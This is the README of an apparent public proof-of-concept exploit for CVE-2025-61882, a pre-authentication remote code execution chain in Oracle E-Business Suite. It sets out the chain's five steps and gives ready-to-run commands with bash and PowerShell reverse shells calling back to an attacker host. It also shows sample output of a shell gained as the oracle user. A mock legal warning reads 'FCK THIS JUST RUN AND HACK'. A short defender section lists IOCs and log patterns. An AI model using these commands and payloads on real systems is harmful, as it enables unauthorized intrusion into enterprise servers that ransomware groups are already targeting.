MindflareX/CVE-2025-61882-POC

# CVE-2025-61882 安全测试工具     ## 🚨 严重法律警告 请参阅我们的[博客文章](https://mindflaresec.com/blog/cve-2025-61882)以获取技术细节 **本工具仅限授权安全测试使用** ``` ╔══════════════════════════════════════════════════════════════╗ ║ ║ ║ 🚨 UNAUTHORIZED ACCESS TO COMPUTER SYSTEMS IS ILLEGAL 🚨 ║ ║ ║ ║ By using this tool, you acknowledge and agree that: ║ ║ ║ ║ ║ ║ FCK THIS JUST RUN AND HACK ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ ╚══════════════════════════════════════════════════════════════╝ ``` ## 📋 概述 CVE-2025-61882安全测试工具，这是一个影响Oracle E-Business Suite的严重预认证远程代码执行漏洞。 **创建者：** Mindflare ### 漏洞详情 - **CVE ID：** CVE-2025-61882 - **CVSS评分：** 9.8（严重） - **攻击向量：** 网络（未认证） - **攻击复杂度：** 中等 - **所需权限：** 无 - **用户交互：** 无 - **受影响版本：** Oracle E-Business Suite 12.2.3 - 12.2.14 - **补丁状态：** 2025年10月4日发布紧急补丁 - **利用状态：** ⚠️ **自2025年8月起被Cl0p勒索软件积极利用** ### 技术摘要 CVE-2025-61882是一个结合了五个不同漏洞的复杂利用链： 1. **SSRF** - 通过`/OA_HTML/configurator/UiServlet`进行服务器端请求伪造 2. **CRLF注入** - 在`return_url`参数中注入HTTP头 3. **HTTP走私** - 利用持久连接滥用以访问内部服务（端口7201） 4. **身份验证绕过** - 通过`/OA_HTML/help/../`前缀进行路径遍历 5. **XSLT注入** - 恶意XSL模板处理导致RCE ## 🎯 预期用途 ### ✅ 可接受用途 - 有书面许可的授权渗透测试 - 对您拥有的系统进行安全研究 - 在受控实验室环境中进行漏洞验证 - 在适当的范围文档中进行的红队练习 - 在机构批准的情况下进行学术研究 - 事件响应和取证分析 ### ❌ 禁止用途 - 任何未经授权的系统访问 - 没有明确书面许可测试系统 - 恶意活动或造成损害 - 未获批准攻击生产系统 - 用于犯罪目的 - 任何违反适用法律的活动 ## 📦 安装 ### 先决条件 - Python 3.7或更高版本 - pip包管理器 - 与目标（仅限授权）的网络连接 - Netcat或类似监听器以接收反向shell ### 设置 ``` # 克隆仓库 git clone https://github.com/[YOUR-USERNAME]/CVE-2025-61882-POC cd CVE-2025-61882-POC # 安装依赖 pip3 install -r requirements.txt # 使脚本可执行（Linux/Mac） chmod +x cve-2025-61882-detector.py ``` ## 🚀 使用 ### 步骤 1：设置您的监听器 在**单独的终端**中，启动一个netcat监听器： ``` # Linux/Mac nc -lvnp 4444 # Windows nc.exe -lvnp 4444 ``` ### 步骤 2：运行工具 **基本用法（Linux目标）：** ``` python3 cve-2025-61882-detector.py \ --target http://192.168.1.22:8000 \ --lhost 192.168.1.10 \ --lport 80 \ --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \ --platform linux ``` **Windows目标：** ``` python3 cve-2025-61882-detector.py \ --target http://192.168.1.22:8000 \ --lhost 192.168.1.10 \ --lport 80 \ --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \ --platform windows ``` ### 参数 | 参数 | 描述 | 必需 | 示例 | |-----------|-------------|----------|---------| | `--target` | 目标Oracle EBS URL | **是** | `http://192.168.1.22:8000` | | `--lhost` | 您的IP地址（用于回调） | **是** | `192.168.1.10` | | `--lport` | HTTP服务器端口（用于服务XSL有效负载） | **是** | `80`或`8080` | | `--command` | 在目标上执行的命令 | **是** | 参见上面示例 | | `--platform` | 目标OS：`linux`或`windows` | **是** | `linux` | ## 📊 示例输出 ### 工具输出 ``` [*] Target URL: http://192.168.1.22:8000 [*] Listener IP: 192.168.1.10 [*] Listener Port: 80 [*] Platform: linux [*] HTTP server started on 192.168.1.10:80 [*] Connecting to target to retrieve CSRF token... [*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0 [*] Cooking HTTP smuggle stub... [*] Sending exploit payload... [*] Exploit payload sent successfully [+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1 [+] XSL payload served successfully ``` ### Netcat监听器输出（如果存在漏洞） ``` ubuntu@attacker:~$ nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 192.168.1.22 30290 bash: no job control in this shell [oracle@apps EBS_domain]$ id uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall) [oracle@apps EBS_domain]$ ``` ## 🛡️ 检测与防御 ### 对于安全防御者 #### 立即行动 1. **应用Oracle紧急补丁**（文档ID：30061882.1） 2. **搜索妥协：** SELECT * FROM XDO_TEMPLATES_B WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%'; 3. **审查自2025年8月以来的访问日志** 4. **阻止EBS服务器的外出互联网连接** #### 检测指标 **网络IOCs：** ``` 200.107.207.26 (Cl0p C2) 161.97.99.49 (Secondary) ``` **HTTP模式：** - `POST /OA_HTML/configurator/UiServlet` - `POST /OA_HTML/SyncServlet` - `GET /OA_HTML/help/../*.jsp` - 参数中的CRLF字符 ## 📚 参考资料 - [Oracle安全警报咨询](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html) - [CISA KEV目录](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - [Google/Mandiant分析](https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation) - [watchTowr Labs研究](https://labs.watchtowr.com/) ## 📜 许可证 MIT许可证，教育用途有限制 - 请参阅[LICENSE](LICENSE) **免责声明：** 本软件仅限授权安全测试使用。未经授权访问计算机系统是非法的。作者对误用不承担任何责任。 ``` **Created by:** Mindflare | **Last Updated:** October 2025 ```

标签：逆向工具